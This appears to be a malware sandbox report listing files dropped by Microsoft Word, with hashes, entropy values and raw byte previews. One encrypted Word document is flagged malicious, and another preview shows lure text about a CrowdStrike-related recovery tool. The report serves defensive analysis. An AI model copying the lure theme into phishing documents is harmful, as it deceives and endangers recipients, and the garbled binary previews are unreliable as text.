    Preview:......Exif..II*.................Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="adobe:docid:photoshop:cf966bc7-2e03-1179-b805-d8edc999fcb6" xmpMM:DocumentID="xmp.did:9328F00B350711E7AC20BD1A5FC75C1C" xmpMM:InstanceID="xmp.iid:9328F00A350711E7AC20BD1A5FC75C1C" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5BC0E725279811E7BFED96D58044CBC1" stRef:documentID="xmp.did:5BC0E726279811E7BFED96D58044CBC1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................$..$-"."-)#""#)8/////
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 540x540, components 3
    Category:dropped
    Size (bytes):38755
    Entropy (8bit):7.969372339631151
    Encrypted:false
    SSDEEP:768:xIw5we0JUmH9lDEt7ABvuRYLZ2CjOkqwP6HtSbIDNEaP2bu4:xIeweU9uABvkYLZ2Cj5PhIefu4
    MD5:D1895189ECEEF4679EAA001B3F779DB3
    SHA1:FC4AAA7A7F84C806F042A80E1F90B8E7236A8559
    SHA-256:3D832CABF1C0DAAA5314F32A8E412E36F5628F6D2A14A021901D667773B382D3
    SHA-512:E44A6E7AA7E2BEE1C1C5635AC255BBCB361D2532A4169F0D1F757EBBAA384B11B1635D932CD44E1748821459F53B81EF79B6642080C77F41BC4D93C8B73F312E
    Malicious:false
    Preview:......JFIF.........................!#.#!0-))-0I48484IoEQEEQEobwaZawb..{{...........................!#.#!0-))-0I48484IoEQEEQEobwaZawb..{{...........................".............................................`:y.C....(.$e.RFmA..QcW..x..I....9..l...u.Rak.J.W....:.F:.Kh`+....CU.QU.g.^..ps.|..4..1CN^.N.b...[....Lt..S...K.....dFLv......yJ.&...?"u..j.....d.F....r...<.....t.D......'Hv I%..^iKI..p..........A..i...u9(^ZS. .'J."l.M.uFE...T....,:8..w..JfJ.K....w,....EE...x........v)...e..=......v..A.{J...].4f1....Y..s.i2nn....}h9....^}...u..W.*...z..Vw.bk.bp......,.... .2.fS...U:dB....r:..N..uG..;b..\m.=z,+.^A....JV*.+...6..l..!.(.Te.k9.*.J..s.5...P....IVF.i$...OA 77D.K x....R.0..nr. }...2g .....Xi...b]E.E.shO..i3G].i..v........jt.L.YG;.T..n2n.d..N.mi..Jl.#......yK...\..al...m.]..e.j.D..eA...Q..~~.F..*..4....0u..<..2.g.......!......].9cF.IX..g3.:n{j.l.......ON.|f....}....qz.!..Elc.X.,.t.j.j;.....I.m.X..sR..0^........;N..N..U..Z
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JSON data
    Category:dropped
    Size (bytes):8515
    Entropy (8bit):2.376758026536063
    Encrypted:false
    SSDEEP:192:OGEGGGBGcGSGwGdGKGjWqGjWUGjW3GjWiGjWAGjWUGjWTGjWwG/zhGzPhGjf4:zJbwx3F8f02FU+UJiUsk
    MD5:53D49444EAF92E0CF5D2985CCAEDE42B
    SHA1:DA2D6C55752243AA5E638750F038DADF3C9FE6CC
    SHA-256:722A39658D2F3D5E333874F23485CEA9DA2B79EDA454FA7F5A9FEFBFDB9B2AD8
    SHA-512:B59D16AE8DCB2D9F02BF7CD594A94D140C9CB308DECFEEDF89B9C166657D8B6BD97FA7CFCF97F0D45E184A470B209F28F1ECC420C5CBF8D88D6E0E1C3AB48064
    Malicious:false
    Preview:{.. "MajorVersion": 1,.. "MinorVersion": 5,.. "ResFamily": [.. {.. "Family": "InkEffect",.. "Res": [.. {.. "n": "inkeffectrainbowglitter",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgalaxy",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectgold",.. "sub": [.. {.. "sn": "",.. "sid": 0,.. "ext": "jpg".. }.. ].. },.. {.. "n": "inkeffectsilver",.. "sub": [.. {.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):2278
    Entropy (8bit):3.844562966056304
    Encrypted:false
    SSDEEP:48:uiTrlKxsxx8xl9Il8uFFViLgYbWmrF7qld1rc:vQYZVicYbWCF79
    MD5:8DD4EE04D7AE71479C85CADB883C8A89
    SHA1:CDA4C6A6E52E90900E8463E952DD8E63FF67D072
    SHA-256:B556853174CF0717396ABA6729FB0B46C742C5BC85BA7F44485392A5F7BBE423
    SHA-512:2C7ECAEC26AA6CF55AFC8D13DEA7E853C8AE9EB16B7E99B8526F7288D0BCA92BED140B41142ABF20307B575F1FDA674EC6FB79FF69372CBC6975FD977F541C62
    Malicious:false
    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.I.0.+.g.U.f.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):4542
    Entropy (8bit):4.005734687659148
    Encrypted:false
    SSDEEP:96:pYZV/8ktGoZ16N27JN30Nc7Q2QEzakdug6/e:p20kkoZ16NCNZQ8vduJG
    MD5:7A1379196918073CB3372B4DECE216FB
    SHA1:345BCC6C6CEF61268F6D22625DD457677ED9EE1C
    SHA-256:A604069536EA8FBB617CFC8DB42C01FB2F5A5D2A5A4320181C33A05803A4AC71
    SHA-512:FE8ECE6FD4430AD2D05C24E0D6A63BAE1A2E925F26B0369724FEA21C67AF19B511D9B0DBFE01848DDF13E69DE4599D45B73F76D9B9A5CBBB6D25C0B27BEFBDAE
    Malicious:false
    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.r.R.S.Z.z./.c.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.0.i.K.n.x.M.
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
    Category:dropped
    Size (bytes):79621
    Entropy (8bit):7.949654755512444
    Encrypted:false
    SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
    MD5:54A07C35DADB508F554F0ED25AA155B3
    SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
    SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
    SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
    Category:dropped
    Size (bytes):66364
    Entropy (8bit):7.930881392262679
    Encrypted:false
    SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
    MD5:FA62B61B2E012E56787AD09FF660B32A
    SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
    SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
    SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
    Category:dropped
    Size (bytes):44995
    Entropy (8bit):7.9304820357792645
    Encrypted:false
    SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
    MD5:D76D9D62CD9BDB3201F8B08A60DDD681
    SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
    SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
    SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
    Category:dropped
    Size (bytes):66364
    Entropy (8bit):7.930881392262679
    Encrypted:false
    SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
    MD5:FA62B61B2E012E56787AD09FF660B32A
    SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
    SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
    SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
    Category:dropped
    Size (bytes):74268
    Entropy (8bit):7.9444839660162145
    Encrypted:false
    SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
    MD5:45C59288E77195B7C14579CD59717986
    SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
    SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
    SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
    Category:dropped
    Size (bytes):44995
    Entropy (8bit):7.9304820357792645
    Encrypted:false
    SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
    MD5:D76D9D62CD9BDB3201F8B08A60DDD681
    SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
    SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
    SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
    Category:dropped
    Size (bytes):79621
    Entropy (8bit):7.949654755512444
    Encrypted:false
    SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
    MD5:54A07C35DADB508F554F0ED25AA155B3
    SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
    SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
    SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
    Category:dropped
    Size (bytes):74268
    Entropy (8bit):7.9444839660162145
    Encrypted:false
    SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
    MD5:45C59288E77195B7C14579CD59717986
    SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
    SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
    SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
    Malicious:false
    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Microsoft Word 2007+
    Category:dropped
    Size (bytes):250145
    Entropy (8bit):7.9935463566733125
    Encrypted:true
    SSDEEP:6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
    MD5:891E6C7EC5DE6384509564D8A0DEDECF
    SHA1:187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
    SHA-256:1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
    SHA-512:27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    Preview:PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;.*"..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ......*.E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):81920
    Entropy (8bit):4.099210753349057
    Encrypted:false
    SSDEEP:384:XtT+CgCz8l15lZzNKY235JzN0jyLUtT+DCz8l15lZzNKY235JzfN0jyL:6Ca/lZzNj235lNdZCa/lZzNj235lFd
    MD5:400C84541516D75316906A9716BE824C
    SHA1:B5CDC0ED9EF4354FB41237439FE682E5A082692E
    SHA-256:E4718B7F3CF08AD696781B66DB4D1E84A7A6AE253BCFCDE4066CF02756EBBABA
    SHA-512:DDB320F30F935FE4328503D3F19431CF036ABCCF30E6CF195AC03D8161007A1D21365E664AC06827119A7864671BF2AE9339FD42D7BFBA6ADA0A9DD65BB1544A
    Malicious:false
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:Composite Document File V2 Document, Cannot read section info
    Category:dropped
    Size (bytes):81920
    Entropy (8bit):4.099210753349057
    Encrypted:false
    SSDEEP:384:XtT+CgCz8l15lZzNKY235JzN0jyLUtT+DCz8l15lZzNKY235JzfN0jyL:6Ca/lZzNj235lNdZCa/lZzNj235lFd
    MD5:400C84541516D75316906A9716BE824C
    SHA1:B5CDC0ED9EF4354FB41237439FE682E5A082692E
    SHA-256:E4718B7F3CF08AD696781B66DB4D1E84A7A6AE253BCFCDE4066CF02756EBBABA
    SHA-512:DDB320F30F935FE4328503D3F19431CF036ABCCF30E6CF195AC03D8161007A1D21365E664AC06827119A7864671BF2AE9339FD42D7BFBA6ADA0A9DD65BB1544A
    Malicious:false
    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.5093262897962565
    Encrypted:false
    SSDEEP:6:mEMEEEe9lCgKRAElAtsArA1klAHdtckxr/Dx:IYP/l/uH6x9rx
    MD5:98F7DF0146DA5D1C46C6ABF7D49ECD62
    SHA1:289E7FFF84BB3843BC652C1FF357CCEA960DAD2F
    SHA-256:D5291DE37D4EFC109AB4052527CE3012DF209FB1672F0CCF61A4578B740A73C0
    SHA-512:5E1D10067BFE38827433374C11C061F026BA80A9F5192CFF21155E99DB0699B8EB8B0C224FB277F7F9CC6E30BCD2779DCF66EAC99302CCD2CA0260DF93BF0DBC
    Malicious:false
    Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...e.n.g.i.n.e.e.r...e......................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...n.......................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):43596
    Entropy (8bit):3.6705361254320246
    Encrypted:false
    SSDEEP:768:6kDl9L3AFPz4qrkv8RkaOIvWRLjCOojE1iRUSlV8ivuCDSle3H0XJ44:pDlV3ABz4Ykv8RkaOIvIPCOojBV8CuCQ
    MD5:814BF7F93B5683057A1729EA1FAE060E
    SHA1:BE861A93A83D93F7D0076A62A3B891525F17BCFD
    SHA-256:AC3B70A9AD0902B84A32390D07C75C4113600164F60C556EA6E54238FF3C1DF6
    SHA-512:95A86E91C7808AC3DFB07FC104DEAAFF482C50F005BB9E651D3AC423B04D850592F4CC7C5D54F2B9C0DAC045C889DC6CFC7090AB8C4A8B7AEE5FA842A0BBAD8D
    Malicious:false
    Preview:..................................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .e.x.p.e.d.i.t.e. .t.h.e. .r.e.p.a.i.r. .p.r.o.c.e.s.s... .T.h.e. .s.i.g.n.e.d. ................................................................................... ..."...........L......................................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..
    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1536
    Entropy (8bit):1.5093262897962567
    Encrypted:false
    SSDEEP:3:ml+lGl+l+l+l1PPPlLlAytl7lhlJvl5hzldlxpxl/b1l/pl/Ppl/Rl/5bhlll/tB:mEMEEEe9lCgKCkgA9P61Y
    MD5:92AC86FA3C6B284A98F00F49FDCACB49
    SHA1:EBE19354C0CB86AEEA9525A3472CCECA8A313EBC
